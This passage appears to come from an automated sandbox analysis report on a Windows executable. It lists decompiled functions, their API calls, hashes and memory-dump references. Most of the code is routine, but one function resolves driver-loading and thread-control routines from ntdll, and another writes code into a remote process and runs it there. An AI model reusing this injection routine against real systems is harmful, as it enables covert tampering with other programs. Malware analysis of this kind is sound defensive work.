                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1127616056-0
                                                                                                                                                                  • Opcode ID: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                  • Instruction ID: edc1d82326a177a4eed1c31c26edb3d60bf211bedf20f6070ddf32627235df0d
                                                                                                                                                                  • Opcode Fuzzy Hash: 58dd6d091b48cbb0307dc7b23365382c2a8386e907ab43d681c23093a5f2522d
                                                                                                                                                                  • Instruction Fuzzy Hash: A9117071500119AFDF11AF64DD06E9E7BA9EF04704F1000BAFB05B6191E7319E608BAD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404951, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404951(signed int* __eax, void* __edx, void** __edi, signed int _a4, char _a8) {
				void* _t8;
				void* _t13;
				signed int _t16;
				void** _t21;
				signed int _t22;

				_t21 = __edi;
				_t22 =  *__eax;
				if(__edx < _t22) {
					return 0;
				} else {
					_t13 =  *__edi;
					do {
						_t1 =  &_a8; // 0x4057e1
						 *__eax =  *__eax +  *_t1;
						_t16 =  *__eax;
					} while (__edx >= _t16);
					_t8 = malloc(_t16 * _a4); // executed
					 *__edi = _t8;
					if(_t22 > 0) {
						if(_t8 != 0) {
							memcpy(_t8, _t13, _t22 * _a4);
						}
						free(_t13); // executed
					}
					return 0 |  *_t21 != 0x00000000;
				}
			}








                                                                                                                                                                  0x00404951
                                                                                                                                                                  0x00404952
                                                                                                                                                                  0x00404956
                                                                                                                                                                  0x004049a1
                                                                                                                                                                  0x00404958
                                                                                                                                                                  0x00404959
                                                                                                                                                                  0x0040495b
                                                                                                                                                                  0x0040495b
                                                                                                                                                                  0x0040495f
                                                                                                                                                                  0x00404961
                                                                                                                                                                  0x00404963
                                                                                                                                                                  0x0040496d
                                                                                                                                                                  0x00404975
                                                                                                                                                                  0x00404977
                                                                                                                                                                  0x0040497b
                                                                                                                                                                  0x00404985
                                                                                                                                                                  0x0040498a
                                                                                                                                                                  0x0040498e
                                                                                                                                                                  0x00404993
                                                                                                                                                                  0x0040499d
                                                                                                                                                                  0x0040499d

                                                                                                                                                                  APIs
                                                                                                                                                                  • malloc.MSVCRT ref: 0040496D
                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 00404985
                                                                                                                                                                  • free.MSVCRT(00000000,00000000,?,004055BF,00000002,?,00000000,?,004057E1,00000000,?,00000000), ref: 0040498E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: freemallocmemcpy
                                                                                                                                                                  • String ID: W@
                                                                                                                                                                  • API String ID: 3056473165-1729568415
                                                                                                                                                                  • Opcode ID: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                  • Instruction ID: 6576f77cd119d718dc8f29c334e0549a7190cc93a29033006f08a56aa9c3ab10
                                                                                                                                                                  • Opcode Fuzzy Hash: 333fb239f4ff1cdabd0487bf4b3bf6bf98c6d246a46385af68035416a7f8f3c9
                                                                                                                                                                  • Instruction Fuzzy Hash: 09F054B26092229FC708AA79B98585BB79DEF84364711487EF514E72D1D7389C40C7A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 31libraryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405436(wchar_t* _a4) {
				void _v2050;
				signed short _v2052;
				void* __esi;
				struct HINSTANCE__* _t16;
				WCHAR* _t18;

				_v2052 = _v2052 & 0x00000000;
				memset( &_v2050, 0, 0x7fe);
				E00404C3C( &_v2052);
				_t18 =  &_v2052;
				E004047AF(_t18);
				wcscat(_t18, _a4);
				_t16 = LoadLibraryW(_t18); // executed
				if(_t16 == 0) {
					return LoadLibraryW(_a4);
				}
				return _t16;
			}








                                                                                                                                                                  0x0040543f
                                                                                                                                                                  0x00405456
                                                                                                                                                                  0x00405462
                                                                                                                                                                  0x00405467
                                                                                                                                                                  0x0040546d
                                                                                                                                                                  0x00405478
                                                                                                                                                                  0x00405489
                                                                                                                                                                  0x0040548d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405492
                                                                                                                                                                  0x00405496

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00404C3C: GetSystemDirectoryW.KERNEL32(0041C6D0,00000104), ref: 00404C52
                                                                                                                                                                    • Part of subcall function 00404C3C: wcscpy.MSVCRT ref: 00404C62
                                                                                                                                                                    • Part of subcall function 004047AF: wcslen.MSVCRT ref: 004047B0
                                                                                                                                                                    • Part of subcall function 004047AF: wcscat.MSVCRT ref: 004047C8
                                                                                                                                                                  • wcscat.MSVCRT ref: 00405478
                                                                                                                                                                  • LoadLibraryW.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoadwcscat$DirectorySystemmemsetwcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3725422290-0
                                                                                                                                                                  • Opcode ID: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                  • Instruction ID: bb87c58107a7235a9df1b9b02ada5b91fca9717c482d10a691b94706fbe65826
                                                                                                                                                                  • Opcode Fuzzy Hash: 1802a75fbf0d54ac87396d762f51419468a1e880665e67f03dd367b63fba9ca4
                                                                                                                                                                  • Instruction Fuzzy Hash: EBF03771D40229A6DF20B7A5CC06B8A7A6CFF40758F0044B6B94CB7191DB7CEA558FD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409E82, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileIntW.KERNEL32 ref: 00409EA9
                                                                                                                                                                    • Part of subcall function 00409D12: memset.MSVCRT ref: 00409D31
                                                                                                                                                                    • Part of subcall function 00409D12: _itow.MSVCRT ref: 00409D48
                                                                                                                                                                    • Part of subcall function 00409D12: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00409D57
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4232544981-0
                                                                                                                                                                  • Opcode ID: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                                                                  • Instruction ID: 9cbd54488ddde29c65bb9f464d3594e5c231a9cc3fc51dd6b87f783e4d357368
                                                                                                                                                                  • Opcode Fuzzy Hash: eeb21031a92c0a089a906d8cada5f37383a5669735d00d1bca9b9fb7ea3296f1
                                                                                                                                                                  • Instruction Fuzzy Hash: CDE0B632000209FFDF125F80EC01AAA3B66FF14315F648569F95814171D33799B0EF88
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408F48, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408F48(void* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				void* _t8;
				void* _t13;

				_v8 = _v8 & 0x00000000;
				_t8 = E00408FC9( &_v8, __eflags, _a4); // executed
				_t13 = _t8;
				if(_v8 != 0) {
					FreeLibrary(_v8);
				}
				return _t13;
			}






                                                                                                                                                                  0x00408f4c
                                                                                                                                                                  0x00408f57
                                                                                                                                                                  0x00408f60
                                                                                                                                                                  0x00408f62
                                                                                                                                                                  0x00408f67
                                                                                                                                                                  0x00408f67
                                                                                                                                                                  0x00408f71

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00408FC9: GetCurrentProcess.KERNEL32(00000028,00000000), ref: 00408FD8
                                                                                                                                                                    • Part of subcall function 00408FC9: GetLastError.KERNEL32(00000000), ref: 00408FEA
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,?,004085BD,SeDebugPrivilege,00000000,?,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408F67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentErrorFreeLastLibraryProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 187924719-0
                                                                                                                                                                  • Opcode ID: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                  • Instruction ID: 8dfc096080dba386992b60ff887e92109f2b64d1c6b3d0c2bddabb0c4d0164ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 66172dc437a911e831faa251a40591583a4df33fd2c7ff74237865ec7cba41cd
                                                                                                                                                                  • Instruction Fuzzy Hash: D6D01231511119FBDF109B91CE06BCDBB79DB00399F104179E400B2190D7759F04E694
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004098F9, Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                                                  			E004098F9(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				intOrPtr* _t6;
				void* _t8;
				struct HINSTANCE__** _t10;

				_t10 = __eax;
				E00409921(__eax);
				_t6 =  *((intOrPtr*)(_t10 + 0x10));
				if(_t6 == 0) {
					return 0;
				}
				_t8 =  *_t6(_a4, 0, _a8, 0x104); // executed
				return _t8;
			}







                                                                                                                                                                  0x004098fa
                                                                                                                                                                  0x004098fc
                                                                                                                                                                  0x00409901
                                                                                                                                                                  0x00409907
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040991c
                                                                                                                                                                  0x00409918
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(00000000,psapi.dll,?,00409901,751459F0,004096DF,00000000,?), ref: 00409941
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 0040994D
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00409959
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00409965
                                                                                                                                                                    • Part of subcall function 00409921: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00409971
                                                                                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004096DF,00000104,004096DF,00000000,?), ref: 00409918
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3859505661-0
                                                                                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction ID: 0481de772a0e6c3324847b7c7a0c8cc4c6a15655966ff13cfb2205d1ba48b523
                                                                                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                  • Instruction Fuzzy Hash: 26D0A9B22183006BD620AAB08C00B4BA2D47B80710F008C2EB590E22D2D274CD105208
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004095DA, Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004095DA(signed int* __edi) {
				void* __esi;
				struct HINSTANCE__* _t3;
				signed int* _t7;

				_t7 = __edi;
				_t3 =  *__edi;
				if(_t3 != 0) {
					FreeLibrary(_t3); // executed
					 *__edi =  *__edi & 0x00000000;
				}
				E004099D4( &(_t7[0xa]));
				return E004099D4( &(_t7[6]));
			}






                                                                                                                                                                  0x004095da
                                                                                                                                                                  0x004095da
                                                                                                                                                                  0x004095de
                                                                                                                                                                  0x004095e1
                                                                                                                                                                  0x004095e7
                                                                                                                                                                  0x004095e7
                                                                                                                                                                  0x004095ee
                                                                                                                                                                  0x004095fc

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,00401DF2,?,00000000,?,?,00000000), ref: 004095E1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                  • Instruction ID: 13308881ed9fba3be053afa591bd741d52050d54eca683c3f8d57f3833d878b6
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a8c82b58b4536e75bc69a87746d6aa363a9327662929a541f6021599fdffafa
                                                                                                                                                                  • Instruction Fuzzy Hash: 5DD0C973401113EBDB01BB26EC856957368BF00315B15012AA801B35E2C738BDA6CAD8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A3C1, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040A3C1(struct HINSTANCE__* _a4, WCHAR* _a8) {

				EnumResourceNamesW(_a4, _a8, E0040A33B, 0); // executed
				return 1;
			}



                                                                                                                                                                  0x0040a3d0
                                                                                                                                                                  0x0040a3d9

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,0040A33B,00000000), ref: 0040A3D0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                  • Opcode ID: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                  • Instruction ID: 553cc51789f51932b097ae14593f850e519bfff9ece1921d1baa913e09089cf7
                                                                                                                                                                  • Opcode Fuzzy Hash: 4e80c9868bdfa7667331217c7ed8963edd970179f9d5bbd233f5df82d78e7ab4
                                                                                                                                                                  • Instruction Fuzzy Hash: 17C09B3215C341D7D7019F208C15F1EF695BB59701F104C39B191A40E0C77140349A05
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                                                                  0x00408e38
                                                                                                                                                                  0x00408e44
                                                                                                                                                                  0x00408e56
                                                                                                                                                                  0x00408e68
                                                                                                                                                                  0x00408e7a
                                                                                                                                                                  0x00408e8c
                                                                                                                                                                  0x00408e9e
                                                                                                                                                                  0x00408eb0
                                                                                                                                                                  0x00408ec2
                                                                                                                                                                  0x00408ed4
                                                                                                                                                                  0x00408ee6
                                                                                                                                                                  0x00408ef8
                                                                                                                                                                  0x00408f0a
                                                                                                                                                                  0x00408f1c
                                                                                                                                                                  0x00408f21
                                                                                                                                                                  0x00408f23
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408f28
                                                                                                                                                                  0x00408f29

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation,?,004097C3), ref: 00408E5B
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver,?,004097C3), ref: 00408E6D
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver,?,004097C3), ref: 00408E7F
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject,?,004097C3), ref: 00408E91
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject,?,004097C3), ref: 00408EA3
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryObject,?,004097C3), ref: 00408EB5
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtOpenThread,?,004097C3), ref: 00408EC7
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtClose,?,004097C3), ref: 00408ED9
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtQueryInformationThread,?,004097C3), ref: 00408EEB
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtSuspendThread,?,004097C3), ref: 00408EFD
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtResumeThread,?,004097C3), ref: 00408F0F
                                                                                                                                                                  • GetProcAddress.KERNEL32(NtTerminateThread,?,004097C3), ref: 00408F21
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                  • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                                                                  • API String ID: 667068680-4280973841
                                                                                                                                                                  • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                  • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                                                                  • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                                                                  • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A46C, Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 208librarymemoryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 70%
                                                                                                                                                                  			E0040A46C(void* __ecx, void* __eflags, void* _a4, void* _a8, void* _a12, void* _a16, intOrPtr _a20, char _a24, void* _a28, intOrPtr _a32) {
				char _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				long _v28;
				char _v564;
				char _v16950;
				char _v33336;
				_Unknown_base(*)()* _v33348;
				_Unknown_base(*)()* _v33352;
				void _v33420;
				void _v33432;
				void _v33436;
				intOrPtr _v66756;
				intOrPtr _v66760;
				void _v66848;
				void _v66852;
				void* __edi;
				void* _t76;
				_Unknown_base(*)()* _t84;
				_Unknown_base(*)()* _t87;
				void* _t90;
				signed int _t126;
				struct HINSTANCE__* _t128;
				intOrPtr* _t138;
				void* _t140;
				void* _t144;
				void* _t147;
				void* _t148;

				E0040B550(0x10524, __ecx);
				_t138 = _a4;
				_v12 = 0;
				 *_t138 = 0;
				_t76 = OpenProcess(0x1f0fff, 0, _a8);
				_a8 = _t76;
				if(_t76 == 0) {
					 *_t138 = GetLastError();
					L30:
					return _v12;
				}
				_v33436 = 0;
				memset( &_v33432, 0, 0x8284);
				_t148 = _t147 + 0xc;
				_t128 = GetModuleHandleW(L"kernel32.dll");
				_v8 = 0;
				E00409C70( &_v8);
				_push("CreateProcessW");
				_push(_t128);
				if(_v8 == 0) {
					_t84 = GetProcAddress();
				} else {
					_t84 = _v8();
				}
				_v33352 = _t84;
				E00409C70( &_v8);
				_push("GetLastError");
				_push(_t128);
				if(_v8 == 0) {
					_t87 = GetProcAddress();
				} else {
					_t87 = _v8();
				}
				_t140 = _a28;
				_v33348 = _t87;
				if(_t140 != 0) {
					_t126 = 0x11;
					memcpy( &_v33420, _t140, _t126 << 2);
					_t148 = _t148 + 0xc;
				}
				_v33420 = 0x44;
				if(_a16 == 0) {
					_v33336 = 1;
				} else {
					E00404923(0x2000,  &_v33336, _a16);
				}
				if(_a12 == 0) {
					_v16950 = 1;
				} else {
					E00404923(0x2000,  &_v16950, _a12);
				}
				if(_a24 == 0) {
					_v564 = 1;
				} else {
					E00404923(0x104,  &_v564, _a24);
				}
				_v24 = _a20;
				_v28 = 0;
				_a16 = VirtualAllocEx(_a8, 0, 0x8288, 0x1000, 4);
				_t90 = VirtualAllocEx(_a8, 0, 0x800, 0x1000, 0x40);
				_a12 = _t90;
				if(_a16 == 0 || _t90 == 0) {
					 *_a4 = GetLastError();
				} else {
					WriteProcessMemory(_a8, _t90, E0040A3DC, 0x800, 0);
					WriteProcessMemory(_a8, _a16,  &_v33436, 0x8288, 0);
					_v20 = 0;
					_v16 = 0;
					_a24 = 0;
					_t144 = E0040A272( &_v20, _a8, _a12, _a16,  &_a24);
					_a28 = _t144;
					if(_t144 == 0) {
						 *_a4 = GetLastError();
					} else {
						ResumeThread(_t144);
						WaitForSingleObject(_t144, 0x7d0);
						CloseHandle(_t144);
					}
					_v66852 = 0;
					memset( &_v66848, 0, 0x8284);
					ReadProcessMemory(_a8, _a16,  &_v66852, 0x8288, 0);
					VirtualFreeEx(_a8, _a16, 0, 0x8000);
					VirtualFreeEx(_a8, _a12, 0, 0x8000);
					if(_a28 != 0) {
						 *_a4 = _v66756;
						_v12 = _v66760;
						if(_a32 != 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
						}
					}
					if(_v20 != 0) {
						FreeLibrary(_v20);
					}
				}
				goto L30;
			}

































                                                                                                                                                                  0x0040a474
                                                                                                                                                                  0x0040a47b
                                                                                                                                                                  0x0040a48a
                                                                                                                                                                  0x0040a48d
                                                                                                                                                                  0x0040a48f
                                                                                                                                                                  0x0040a497
                                                                                                                                                                  0x0040a49a
                                                                                                                                                                  0x0040a6f7
                                                                                                                                                                  0x0040a6f9
                                                                                                                                                                  0x0040a700
                                                                                                                                                                  0x0040a700
                                                                                                                                                                  0x0040a4ad
                                                                                                                                                                  0x0040a4b3
                                                                                                                                                                  0x0040a4b8
                                                                                                                                                                  0x0040a4c6
                                                                                                                                                                  0x0040a4cc
                                                                                                                                                                  0x0040a4cf
                                                                                                                                                                  0x0040a4dd
                                                                                                                                                                  0x0040a4e2
                                                                                                                                                                  0x0040a4e3
                                                                                                                                                                  0x0040a4ea
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4e5
                                                                                                                                                                  0x0040a4ec
                                                                                                                                                                  0x0040a4f6
                                                                                                                                                                  0x0040a4fe
                                                                                                                                                                  0x0040a503
                                                                                                                                                                  0x0040a504
                                                                                                                                                                  0x0040a50b
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a506
                                                                                                                                                                  0x0040a50d
                                                                                                                                                                  0x0040a512
